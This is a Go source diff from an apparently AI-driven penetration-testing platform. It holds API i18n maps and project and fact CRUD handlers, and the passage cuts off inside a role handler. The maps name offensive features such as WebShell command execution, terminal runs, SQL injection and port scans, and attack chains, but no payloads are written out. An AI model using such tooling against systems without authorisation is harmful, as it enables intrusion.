"发送消息并获取AI回复(非流式)": "sendMessageNonStream", "发送消息并获取AI回复(流式)": "sendMessageStream",
|
||||
"取消任务": "cancelTask", "列出运行中的任务": "listRunningTasks", "列出已完成的任务": "listCompletedTasks",
|
||||
"创建批量任务队列": "createBatchQueue", "列出批量任务队列": "listBatchQueues", "获取批量任务队列": "getBatchQueue",
|
||||
"删除批量任务队列": "deleteBatchQueue", "启动批量任务队列": "startBatchQueue", "暂停批量任务队列": "pauseBatchQueue",
|
||||
"添加任务到队列": "addTaskToQueue", "SQL注入扫描": "sqlInjectionScan", "端口扫描": "portScan",
|
||||
"更新批量任务": "updateBatchTask", "删除批量任务": "deleteBatchTask",
|
||||
"创建分组": "createGroup", "列出分组": "listGroups", "获取分组": "getGroup", "更新分组": "updateGroup",
|
||||
"删除分组": "deleteGroup", "获取分组中的对话": "getGroupConversations", "添加对话到分组": "addConversationToGroup",
|
||||
"从分组移除对话": "removeConversationFromGroup",
|
||||
"列出漏洞": "listVulnerabilities", "创建漏洞": "createVulnerability", "获取漏洞统计": "getVulnerabilityStats",
|
||||
"获取漏洞": "getVulnerability", "更新漏洞": "updateVulnerability", "删除漏洞": "deleteVulnerability",
|
||||
"列出角色": "listRoles", "创建角色": "createRole", "获取角色": "getRole", "更新角色": "updateRole", "删除角色": "deleteRole",
|
||||
"获取可用Skills列表": "getAvailableSkills", "列出Skills": "listSkills", "创建Skill": "createSkill",
|
||||
"获取Skill统计": "getSkillStats", "清空Skill统计": "clearSkillStats", "获取Skill": "getSkill",
|
||||
"更新Skill": "updateSkill", "删除Skill": "deleteSkill", "获取绑定角色": "getBoundRoles",
|
||||
"获取监控信息": "getMonitorInfo", "获取执行记录": "getExecutionRecords", "删除执行记录": "deleteExecutionRecord",
|
||||
"批量删除执行记录": "batchDeleteExecutionRecords", "获取统计信息": "getStats",
|
||||
"获取配置": "getConfig", "更新配置": "updateConfig", "获取工具配置": "getToolConfig", "应用配置": "applyConfig",
|
||||
"列出外部MCP": "listExternalMCP", "获取外部MCP统计": "getExternalMCPStats", "获取外部MCP": "getExternalMCP",
|
||||
"添加或更新外部MCP": "addOrUpdateExternalMCP", "stdio模式配置": "stdioModeConfig", "SSE模式配置": "sseModeConfig",
|
||||
"删除外部MCP": "deleteExternalMCP", "启动外部MCP": "startExternalMCP", "停止外部MCP": "stopExternalMCP",
|
||||
"获取攻击链": "getAttackChain", "重新生成攻击链": "regenerateAttackChain",
|
||||
"设置对话置顶": "pinConversation", "设置分组置顶": "pinGroup", "设置分组中对话的置顶": "pinGroupConversation",
|
||||
"获取分类": "getCategories", "列出知识项": "listKnowledgeItems", "创建知识项": "createKnowledgeItem",
|
||||
"获取知识项": "getKnowledgeItem", "更新知识项": "updateKnowledgeItem", "删除知识项": "deleteKnowledgeItem",
|
||||
"获取索引状态": "getIndexStatus", "重建索引": "rebuildIndex", "扫描知识库": "scanKnowledgeBase",
|
||||
"搜索知识库": "searchKnowledgeBase", "基础搜索": "basicSearch", "按风险类型搜索": "searchByRiskType",
|
||||
"获取检索日志": "getRetrievalLogs", "删除检索日志": "deleteRetrievalLog",
|
||||
"MCP端点": "mcpEndpoint", "列出所有工具": "listAllTools", "调用工具": "invokeTool", "初始化连接": "initConnection",
|
||||
"成功响应": "successResponse", "错误响应": "errorResponse",
|
||||
// 新增缺失端点
|
||||
"删除对话轮次": "deleteConversationTurn", "获取消息过程详情": "getMessageProcessDetails",
|
||||
"重跑批量任务队列": "rerunBatchQueue", "修改队列元数据": "updateBatchQueueMetadata",
|
||||
"修改队列调度配置": "updateBatchQueueSchedule", "开关Cron自动调度": "setBatchQueueScheduleEnabled",
|
||||
"获取所有分组映射": "getAllGroupMappings",
|
||||
"FOFA搜索": "fofaSearch", "自然语言解析为FOFA语法": "fofaParse",
|
||||
"测试OpenAI API连接": "testOpenAI",
|
||||
"执行终端命令": "terminalRun", "流式执行终端命令": "terminalRunStream", "WebSocket终端": "terminalWS",
|
||||
"列出WebShell连接": "listWebshellConnections", "创建WebShell连接": "createWebshellConnection",
|
||||
"更新WebShell连接": "updateWebshellConnection", "删除WebShell连接": "deleteWebshellConnection",
|
||||
"获取连接状态": "getWebshellConnectionState", "保存连接状态": "saveWebshellConnectionState",
|
||||
"获取AI对话历史": "getWebshellAIHistory", "列出AI对话": "listWebshellAIConversations",
|
||||
"执行WebShell命令": "webshellExec", "WebShell文件操作": "webshellFileOp",
|
||||
"列出附件": "listChatUploads", "上传附件": "uploadChatFile", "删除附件": "deleteChatUpload",
|
||||
"下载附件": "downloadChatUpload", "获取附件文本内容": "getChatUploadContent",
|
||||
"写入附件文本内容": "putChatUploadContent", "创建附件目录": "mkdirChatUpload", "重命名附件": "renameChatUpload",
|
||||
"企业微信回调验证": "wecomCallbackVerify", "企业微信消息回调": "wecomCallbackMessage",
|
||||
"钉钉消息回调": "dingtalkCallback", "飞书消息回调": "larkCallback", "测试机器人消息处理": "testRobot",
|
||||
"列出Markdown代理": "listMarkdownAgents", "创建Markdown代理": "createMarkdownAgent",
|
||||
"获取Markdown代理详情": "getMarkdownAgent", "更新Markdown代理": "updateMarkdownAgent", "删除Markdown代理": "deleteMarkdownAgent",
|
||||
"列出技能包文件": "listSkillPackageFiles", "获取技能包文件内容": "getSkillPackageFile", "写入技能包文件": "putSkillPackageFile",
|
||||
"批量获取工具名称": "batchGetToolNames",
|
||||
"获取知识库统计": "getKnowledgeStats",
|
||||
}
|
||||
|
||||
var apiDocI18nResponseDescToKey = map[string]string{
|
||||
"获取成功": "getSuccess", "未授权": "unauthorized", "未授权,需要有效的Token": "unauthorizedToken",
|
||||
"创建成功": "createSuccess", "请求参数错误": "badRequest", "对话不存在": "conversationNotFound",
|
||||
"对话不存在或结果不存在": "conversationOrResultNotFound", "请求参数错误(如task为空)": "badRequestTaskEmpty",
|
||||
"请求参数错误或分组名称已存在": "badRequestGroupNameExists", "分组不存在": "groupNotFound",
|
||||
"请求参数错误(如配置格式不正确、缺少必需字段等)": "badRequestConfig",
|
||||
"请求参数错误(如query为空)": "badRequestQueryEmpty", "方法不允许(仅支持POST请求)": "methodNotAllowed",
|
||||
"登录成功": "loginSuccess", "密码错误": "invalidPassword", "登出成功": "logoutSuccess",
|
||||
"密码修改成功": "passwordChanged", "Token有效": "tokenValid", "Token无效或已过期": "tokenInvalid",
|
||||
"对话创建成功": "conversationCreated", "服务器内部错误": "internalError", "更新成功": "updateSuccess",
|
||||
"删除成功": "deleteSuccess", "队列不存在": "queueNotFound", "启动成功": "startSuccess",
|
||||
"暂停成功": "pauseSuccess", "添加成功": "addSuccess",
|
||||
"任务不存在": "taskNotFound", "对话或分组不存在": "conversationOrGroupNotFound",
|
||||
"取消请求已提交": "cancelSubmitted", "未找到正在执行的任务": "noRunningTask",
|
||||
"消息发送成功,返回AI回复": "messageSent", "流式响应(Server-Sent Events)": "streamResponse",
|
||||
// 新增缺失端点响应
|
||||
"参数错误或删除失败": "badRequestOrDeleteFailed",
|
||||
"参数错误": "paramError", "仅已完成或已取消的队列可以重跑": "onlyCompletedOrCancelledCanRerun",
|
||||
"参数错误或队列正在运行中": "badRequestOrQueueRunning", "设置成功": "setSuccess",
|
||||
"搜索成功": "searchSuccess", "解析成功": "parseSuccess", "测试结果": "testResult",
|
||||
"执行完成": "executionDone", "SSE事件流": "sseEventStream", "WebSocket连接已建立": "wsEstablished",
|
||||
"文件下载": "fileDownload", "文件不存在": "fileNotFound", "写入成功": "writeSuccess",
|
||||
"重命名成功": "renameSuccess", "验证成功,返回解密后的echostr": "wecomVerifySuccess",
|
||||
"处理成功": "processSuccess", "代理不存在": "agentNotFound", "保存成功": "saveSuccess",
|
||||
"操作结果": "operationResult", "执行结果": "executionResult", "连接不存在": "connectionNotFound",
|
||||
}
|
||||
|
||||
// enrichSpecWithI18nKeys 在 spec 的每个 operation 上写入 x-i18n-tags、x-i18n-summary,
|
||||
// 在每个 response 上写入 x-i18n-description,供前端按 key 做国际化。
|
||||
func enrichSpecWithI18nKeys(spec map[string]interface{}) {
|
||||
paths, _ := spec["paths"].(map[string]interface{})
|
||||
if paths == nil {
|
||||
return
|
||||
}
|
||||
for _, pathItem := range paths {
|
||||
pm, _ := pathItem.(map[string]interface{})
|
||||
if pm == nil {
|
||||
continue
|
||||
}
|
||||
for _, method := range []string{"get", "post", "put", "delete", "patch"} {
|
||||
opVal, ok := pm[method]
|
||||
if !ok {
|
||||
continue
|
||||
}
|
||||
op, _ := opVal.(map[string]interface{})
|
||||
if op == nil {
|
||||
continue
|
||||
}
|
||||
// x-i18n-tags: 与 tags 一一对应的 i18n 键数组(spec 中 tags 为 []string)
|
||||
switch tags := op["tags"].(type) {
|
||||
case []string:
|
||||
if len(tags) > 0 {
|
||||
keys := make([]string, 0, len(tags))
|
||||
for _, s := range tags {
|
||||
if k := apiDocI18nTagToKey[s]; k != "" {
|
||||
keys = append(keys, k)
|
||||
} else {
|
||||
keys = append(keys, s)
|
||||
}
|
||||
}
|
||||
op["x-i18n-tags"] = keys
|
||||
}
|
||||
case []interface{}:
|
||||
if len(tags) > 0 {
|
||||
keys := make([]interface{}, 0, len(tags))
|
||||
for _, t := range tags {
|
||||
if s, ok := t.(string); ok {
|
||||
if k := apiDocI18nTagToKey[s]; k != "" {
|
||||
keys = append(keys, k)
|
||||
} else {
|
||||
keys = append(keys, s)
|
||||
}
|
||||
}
|
||||
}
|
||||
if len(keys) > 0 {
|
||||
op["x-i18n-tags"] = keys
|
||||
}
|
||||
}
|
||||
}
|
||||
// x-i18n-summary
|
||||
if summary, _ := op["summary"].(string); summary != "" {
|
||||
if k := apiDocI18nSummaryToKey[summary]; k != "" {
|
||||
op["x-i18n-summary"] = k
|
||||
}
|
||||
}
|
||||
// responses -> 每个 status -> x-i18n-description
|
||||
if respMap, _ := op["responses"].(map[string]interface{}); respMap != nil {
|
||||
for _, rv := range respMap {
|
||||
if r, _ := rv.(map[string]interface{}); r != nil {
|
||||
if desc, _ := r["description"].(string); desc != "" {
|
||||
if k := apiDocI18nResponseDescToKey[desc]; k != "" {
|
||||
r["x-i18n-description"] = k
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,410 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"strconv"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/project"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
const maxProjectDescriptionRunes = 4000
|
||||
|
||||
func clampProjectDescription(s string) string {
|
||||
r := []rune(s)
|
||||
if len(r) <= maxProjectDescriptionRunes {
|
||||
return s
|
||||
}
|
||||
return string(r[:maxProjectDescriptionRunes])
|
||||
}
|
||||
|
||||
// ProjectHandler 项目管理处理器。
|
||||
type ProjectHandler struct {
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
// NewProjectHandler 创建项目管理处理器。
|
||||
func NewProjectHandler(db *database.DB, logger *zap.Logger) *ProjectHandler {
|
||||
return &ProjectHandler{db: db, logger: logger}
|
||||
}
|
||||
|
||||
type createProjectRequest struct {
|
||||
Name string `json:"name" binding:"required"`
|
||||
Description string `json:"description"`
|
||||
ScopeJSON string `json:"scope_json"`
|
||||
Status string `json:"status"`
|
||||
}
|
||||
|
||||
// updateProjectRequest 部分更新:字段省略表示不修改;传 null 或 "" 可清空字符串字段。
|
||||
type updateProjectRequest struct {
|
||||
Name *string `json:"name"`
|
||||
Description *string `json:"description"`
|
||||
ScopeJSON *string `json:"scope_json"`
|
||||
Status *string `json:"status"`
|
||||
Pinned *bool `json:"pinned"`
|
||||
}
|
||||
|
||||
// CreateProject POST /api/projects
|
||||
func (h *ProjectHandler) CreateProject(c *gin.Context) {
|
||||
var req createProjectRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
p := &database.Project{
|
||||
Name: strings.TrimSpace(req.Name),
|
||||
Description: clampProjectDescription(req.Description),
|
||||
ScopeJSON: req.ScopeJSON,
|
||||
Status: strings.TrimSpace(req.Status),
|
||||
}
|
||||
created, err := h.db.CreateProject(p)
|
||||
if err != nil {
|
||||
h.logger.Error("创建项目失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, created)
|
||||
}
|
||||
|
||||
// GetDashboardSummary GET /api/projects/dashboard-summary
|
||||
func (h *ProjectHandler) GetDashboardSummary(c *gin.Context) {
|
||||
limit, _ := strconv.Atoi(strings.TrimSpace(c.DefaultQuery("fact_limit", "5")))
|
||||
if limit <= 0 {
|
||||
limit = 5
|
||||
}
|
||||
if limit > 50 {
|
||||
limit = 50
|
||||
}
|
||||
summary, err := h.db.GetProjectDashboardSummary(limit)
|
||||
if err != nil {
|
||||
h.logger.Error("获取项目仪表盘摘要失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if summary.RecentFacts == nil {
|
||||
summary.RecentFacts = []database.ProjectDashboardFact{}
|
||||
}
|
||||
c.JSON(http.StatusOK, summary)
|
||||
}
|
||||
|
||||
// ListProjects GET /api/projects
|
||||
func (h *ProjectHandler) ListProjects(c *gin.Context) {
|
||||
status := c.Query("status")
|
||||
search := c.Query("search")
|
||||
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "50"))
|
||||
offset, _ := strconv.Atoi(c.Query("offset"))
|
||||
if limit <= 0 {
|
||||
limit = 50
|
||||
}
|
||||
if limit > 500 {
|
||||
limit = 500
|
||||
}
|
||||
list, err := h.db.ListProjects(status, search, limit, offset)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if list == nil {
|
||||
list = []*database.Project{}
|
||||
}
|
||||
total, err := h.db.CountProjects(status, search)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"projects": list,
|
||||
"total": total,
|
||||
"limit": limit,
|
||||
"offset": offset,
|
||||
})
|
||||
}
|
||||
|
||||
// GetProjectStats GET /api/projects/:id/stats
|
||||
func (h *ProjectHandler) GetProjectStats(c *gin.Context) {
|
||||
stats, err := project.GetProjectStats(h.db, c.Param("id"))
|
||||
if err != nil {
|
||||
if strings.Contains(err.Error(), "不存在") {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "项目不存在"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, stats)
|
||||
}
|
||||
|
||||
// ListProjectConversations GET /api/projects/:id/conversations
|
||||
func (h *ProjectHandler) ListProjectConversations(c *gin.Context) {
|
||||
projectID := c.Param("id")
|
||||
if _, err := h.db.GetProject(projectID); err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "项目不存在"})
|
||||
return
|
||||
}
|
||||
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "100"))
|
||||
offset, _ := strconv.Atoi(c.Query("offset"))
|
||||
list, err := h.db.ListConversationsByProjectID(projectID, limit, offset)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if list == nil {
|
||||
list = []*database.Conversation{}
|
||||
}
|
||||
total, _ := h.db.CountConversationsByProjectID(projectID)
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"conversations": list,
|
||||
"total": total,
|
||||
"limit": limit,
|
||||
"offset": offset,
|
||||
})
|
||||
}
|
||||
|
||||
// GetProject GET /api/projects/:id
|
||||
func (h *ProjectHandler) GetProject(c *gin.Context) {
|
||||
p, err := h.db.GetProject(c.Param("id"))
|
||||
if err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "项目不存在"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, p)
|
||||
}
|
||||
|
||||
// UpdateProject PUT /api/projects/:id
|
||||
func (h *ProjectHandler) UpdateProject(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
p, err := h.db.GetProject(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "项目不存在"})
|
||||
return
|
||||
}
|
||||
var req updateProjectRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if req.Name != nil {
|
||||
if s := strings.TrimSpace(*req.Name); s != "" {
|
||||
p.Name = s
|
||||
}
|
||||
}
|
||||
if req.Description != nil {
|
||||
p.Description = clampProjectDescription(*req.Description)
|
||||
}
|
||||
if req.ScopeJSON != nil {
|
||||
p.ScopeJSON = *req.ScopeJSON
|
||||
}
|
||||
if req.Status != nil {
|
||||
if s := strings.TrimSpace(*req.Status); s != "" {
|
||||
p.Status = s
|
||||
}
|
||||
}
|
||||
if req.Pinned != nil {
|
||||
p.Pinned = *req.Pinned
|
||||
}
|
||||
if err := h.db.UpdateProject(p); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, p)
|
||||
}
|
||||
|
||||
// DeleteProject DELETE /api/projects/:id
|
||||
func (h *ProjectHandler) DeleteProject(c *gin.Context) {
|
||||
if err := h.db.DeleteProject(c.Param("id")); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"success": true})
|
||||
}
|
||||
|
||||
type upsertFactRequest struct {
|
||||
FactKey string `json:"fact_key" binding:"required"`
|
||||
Category string `json:"category"`
|
||||
Summary string `json:"summary" binding:"required"`
|
||||
Body string `json:"body"`
|
||||
Confidence string `json:"confidence"`
|
||||
Pinned bool `json:"pinned"`
|
||||
RelatedVulnerabilityID string `json:"related_vulnerability_id"`
|
||||
}
|
||||
|
||||
// updateFactRequest 部分更新事实;指针字段省略=不修改,body 传 "" 可清空(仍走 merge 逻辑见 Upsert)。
|
||||
type updateFactRequest struct {
|
||||
FactKey *string `json:"fact_key"`
|
||||
Category *string `json:"category"`
|
||||
Summary *string `json:"summary"`
|
||||
Body *string `json:"body"`
|
||||
Confidence *string `json:"confidence"`
|
||||
Pinned *bool `json:"pinned"`
|
||||
RelatedVulnerabilityID *string `json:"related_vulnerability_id"`
|
||||
ClearBody bool `json:"clear_body"`
|
||||
}
|
||||
|
||||
// ListFacts GET /api/projects/:id/facts (fact_key 查询参数可获取单条详情)
|
||||
func (h *ProjectHandler) ListFacts(c *gin.Context) {
|
||||
projectID := c.Param("id")
|
||||
if key := strings.TrimSpace(c.Query("fact_key")); key != "" {
|
||||
f, err := h.db.GetProjectFactByKey(projectID, key)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, f)
|
||||
return
|
||||
}
|
||||
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "100"))
|
||||
offset, _ := strconv.Atoi(c.Query("offset"))
|
||||
filter := database.ProjectFactListFilter{
|
||||
Category: c.Query("category"),
|
||||
Confidence: c.Query("confidence"),
|
||||
Search: c.Query("search"),
|
||||
RelatedVulnerabilityID: c.Query("related_vulnerability_id"),
|
||||
}
|
||||
if c.Query("exclude_deprecated") == "1" || c.Query("exclude_deprecated") == "true" {
|
||||
filter.ExcludeDeprecated = true
|
||||
}
|
||||
list, err := h.db.ListProjectFacts(projectID, filter, limit, offset)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if list == nil {
|
||||
list = []*database.ProjectFact{}
|
||||
}
|
||||
if sparseOnly := c.Query("sparse_only"); sparseOnly == "1" || sparseOnly == "true" {
|
||||
filtered := make([]*database.ProjectFact, 0, len(list))
|
||||
for _, f := range list {
|
||||
if project.IsSparseFactBody(f.Category, f.FactKey, f.Body) {
|
||||
filtered = append(filtered, f)
|
||||
}
|
||||
}
|
||||
list = filtered
|
||||
}
|
||||
c.JSON(http.StatusOK, list)
|
||||
}
|
||||
|
||||
// CreateFact POST /api/projects/:id/facts
|
||||
func (h *ProjectHandler) CreateFact(c *gin.Context) {
|
||||
var req upsertFactRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
f := &database.ProjectFact{
|
||||
ProjectID: c.Param("id"),
|
||||
FactKey: req.FactKey,
|
||||
Category: req.Category,
|
||||
Summary: req.Summary,
|
||||
Body: req.Body,
|
||||
Confidence: req.Confidence,
|
||||
Pinned: req.Pinned,
|
||||
RelatedVulnerabilityID: req.RelatedVulnerabilityID,
|
||||
}
|
||||
created, err := h.db.UpsertProjectFact(f)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, created)
|
||||
}
|
||||
|
||||
// UpdateFact PUT /api/projects/:id/facts/:factId
|
||||
func (h *ProjectHandler) UpdateFact(c *gin.Context) {
|
||||
existing, err := h.db.GetProjectFact(c.Param("factId"))
|
||||
if err != nil || existing.ProjectID != c.Param("id") {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"})
|
||||
return
|
||||
}
|
||||
var req updateFactRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if req.FactKey != nil {
|
||||
if k := strings.TrimSpace(*req.FactKey); k != "" {
|
||||
existing.FactKey = k
|
||||
}
|
||||
}
|
||||
if req.Category != nil && strings.TrimSpace(*req.Category) != "" {
|
||||
existing.Category = *req.Category
|
||||
}
|
||||
if req.Summary != nil && strings.TrimSpace(*req.Summary) != "" {
|
||||
existing.Summary = *req.Summary
|
||||
}
|
||||
if req.ClearBody {
|
||||
existing.Body = ""
|
||||
} else if req.Body != nil {
|
||||
existing.Body = *req.Body
|
||||
}
|
||||
if req.Confidence != nil && strings.TrimSpace(*req.Confidence) != "" {
|
||||
existing.Confidence = *req.Confidence
|
||||
}
|
||||
if req.Pinned != nil {
|
||||
existing.Pinned = *req.Pinned
|
||||
}
|
||||
if req.RelatedVulnerabilityID != nil {
|
||||
existing.RelatedVulnerabilityID = *req.RelatedVulnerabilityID
|
||||
}
|
||||
updated, err := h.db.UpsertProjectFact(existing)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, updated)
|
||||
}
|
||||
|
||||
// DeleteFact DELETE /api/projects/:id/facts/:factId
|
||||
func (h *ProjectHandler) DeleteFact(c *gin.Context) {
|
||||
existing, err := h.db.GetProjectFact(c.Param("factId"))
|
||||
if err != nil || existing.ProjectID != c.Param("id") {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"})
|
||||
return
|
||||
}
|
||||
if err := h.db.DeleteProjectFact(existing.ID); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"success": true})
|
||||
}
|
||||
|
||||
type deprecateFactRequest struct {
|
||||
FactKey string `json:"fact_key" binding:"required"`
|
||||
}
|
||||
|
||||
// DeprecateFact POST /api/projects/:id/facts/deprecate
|
||||
func (h *ProjectHandler) DeprecateFact(c *gin.Context) {
|
||||
var req deprecateFactRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if err := h.db.DeprecateProjectFact(c.Param("id"), req.FactKey); err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"success": true})
|
||||
}
|
||||
|
||||
type restoreFactRequest struct {
|
||||
FactKey string `json:"fact_key" binding:"required"`
|
||||
Confidence string `json:"confidence"` // 可选:confirmed | tentative,默认 tentative
|
||||
}
|
||||
|
||||
// RestoreFact POST /api/projects/:id/facts/restore
|
||||
func (h *ProjectHandler) RestoreFact(c *gin.Context) {
|
||||
var req restoreFactRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if err := h.db.RestoreProjectFact(c.Param("id"), req.FactKey, req.Confidence); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"success": true})
|
||||
}
|
||||
@@ -0,0 +1,48 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/project"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// projectBlackboardBlock 根据对话 ID 构建项目事实索引块(用于注入 system prompt)。
|
||||
func (h *AgentHandler) projectBlackboardBlock(conversationID string) string {
|
||||
if h == nil || h.db == nil || h.config == nil {
|
||||
return ""
|
||||
}
|
||||
if !h.config.Project.Enabled {
|
||||
return ""
|
||||
}
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
if conversationID == "" {
|
||||
return ""
|
||||
}
|
||||
projectID, err := h.db.GetConversationProjectID(conversationID)
|
||||
if err != nil || projectID == "" {
|
||||
return ""
|
||||
}
|
||||
block, err := project.BuildProjectBlackboardBlock(h.db, projectID, h.config.Project)
|
||||
if err != nil {
|
||||
h.logger.Warn("构建项目黑板索引失败", zap.String("conversationId", conversationID), zap.Error(err))
|
||||
return ""
|
||||
}
|
||||
return strings.TrimSpace(block)
|
||||
}
|
||||
|
||||
// conversationProjectID 返回对话绑定的项目 ID;未绑定或查询失败时返回空字符串。
|
||||
func (h *AgentHandler) conversationProjectID(conversationID string) string {
|
||||
if h == nil || h.db == nil {
|
||||
return ""
|
||||
}
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
if conversationID == "" {
|
||||
return ""
|
||||
}
|
||||
projectID, err := h.db.GetConversationProjectID(conversationID)
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
return strings.TrimSpace(projectID)
|
||||
}
|
||||
@@ -0,0 +1,18 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
)
|
||||
|
||||
// effectiveProjectID 请求/队列显式项目优先,否则使用 config.project.default_project_id。
|
||||
func effectiveProjectID(cfg *config.Config, explicit string) string {
|
||||
if pid := strings.TrimSpace(explicit); pid != "" {
|
||||
return pid
|
||||
}
|
||||
if cfg != nil {
|
||||
return strings.TrimSpace(cfg.Project.DefaultProjectID)
|
||||
}
|
||||
return ""
|
||||
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,469 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"regexp"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"gopkg.in/yaml.v3"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// RoleHandler 角色处理器
|
||||
type RoleHandler struct {
|
||||
config *config.Config
|
||||
configPath string
|
||||
logger *zap.Logger
|
||||
audit *audit.Service
|
||||
}
|
||||
|
||||
// SetAudit wires platform audit logging.
|
||||
func (h *RoleHandler) SetAudit(s *audit.Service) {
|
||||
h.audit = s
|
||||
}
|
||||
|
||||
// NewRoleHandler 创建新的角色处理器
|
||||
func NewRoleHandler(cfg *config.Config, configPath string, logger *zap.Logger) *RoleHandler {
|
||||
return &RoleHandler{
|
||||
config: cfg,
|
||||
configPath: configPath,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
// GetRoles 获取所有角色
|
||||
func (h *RoleHandler) GetRoles(c *gin.Context) {
|
||||
if h.config.Roles == nil {
|
||||
h.config.Roles = make(map[string]config.RoleConfig)
|
||||
}
|
||||
|
||||
roles := make([]config.RoleConfig, 0, len(h.config.Roles))
|
||||
for key, role := range h.config.Roles {
|
||||
// 确保角色的key与name一致
|
||||
if role.Name == "" {
|
||||
role.Name = key
|
||||
}
|
||||
roles = append(roles, role)
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"roles": roles,
|
||||
})
|
||||
}
|
||||
|
||||
// GetRole 获取单个角色
|
||||
func (h *RoleHandler) GetRole(c *gin.Context) {
|
||||
roleName := c.Param("name")
|
||||
if roleName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
if h.config.Roles == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
role, exists := h.config.Roles[roleName]
|
||||
if !exists {
|
||||
